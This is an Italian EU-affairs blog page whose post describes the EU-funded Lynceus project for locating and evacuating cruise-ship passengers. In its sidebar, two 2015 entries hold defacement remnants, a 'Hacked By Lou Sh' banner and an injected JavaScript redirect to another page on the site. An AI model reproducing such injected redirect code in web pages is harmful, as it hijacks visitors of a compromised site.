EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

Più sicurezza per le navi da crociera




L’Ue si impegna e finanzia il progetto Lynceus

Per l’Ue la sicurezza durante il tragitto in mare è un aspetto fondamentale per poter salvaguardare i cittadini europei. Con il sostegno europeo per la ricerca, ogni qualvolta si avrà la necessità ed il bisogno di evacuare i mezzi marittimi lo si potrà fare in maniera più efficiente e sicura. Nella ricerca finanziata dall’Ue sono inoltre compresi dei progetti per rendere più stabili le navi da crociera e i traghetti.

Il progetto per rendere più efficiente i mezzi marittimi ha il nome di Lynceus e terminerà all’inizio del 2015. L’Ue ha speso 2,5 milioni di euro per portarlo avanti e coinvolge 15 partecipanti che provengono da Cipro, Germania, Grecia, Italia, Spagna, Svizzera e Regno Unito. Esso consente di ottenere una rapida localizzazione dei passeggeri a bordo, grazie a delle tecnologie senza fili a basso consumo, per consentire una migliore ricerca e un più rapido salvataggio dei passeggeri.

Il progetto contiene anche altre innovazioni tra cui quella di monitorare la salute dei pazienti con l’applicazione di braccialetti idonei o la possibilità per i genitori di poter sapere in qualsiasi momento gli spostamenti dei propri figli a bordo delle grandi navi da crociera.

JPEG - 1.3 Kb

Ma cosa ancor più importante, grazie alle applicazioni del progetto Lynceus sarà possibile sapere l’esatta localizzazione dei passeggeri caduti in mare.

L’impegno dell’UE per la sicurezza marittima è attivo già da anni: nel 2012 si è concluso GOALDS, progetto al quale l’Europa aveva destinato 3 milioni di euro e che ha aumentato del 20% la sicurezza delle grandi navi da crociera in caso di incaglio o collisione.

PNG - 102.6 Kb

Nelle parole della Commissaria europea per la ricerca, l’innovazione e la scienza, Máire Geoghegan-Quinn: "Questi progetti costituiscono un buon esempio di come stiamo affrontando questioni che possono migliorare – e in questo caso particolare addirittura salvare potenzialmente – la vita delle persone. Continueremo a investire in questo tipo di ricerca e innovazione attraverso il nostro nuovo programma Horizon 2020".



Nessun commento
ds Aggiungere un commento

Autori

Vanessa Piacenti
Studentessa del corso di laurea triennale in Scienze della comunicazione, Università si Roma Tor Vergata.

Parole chiave



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France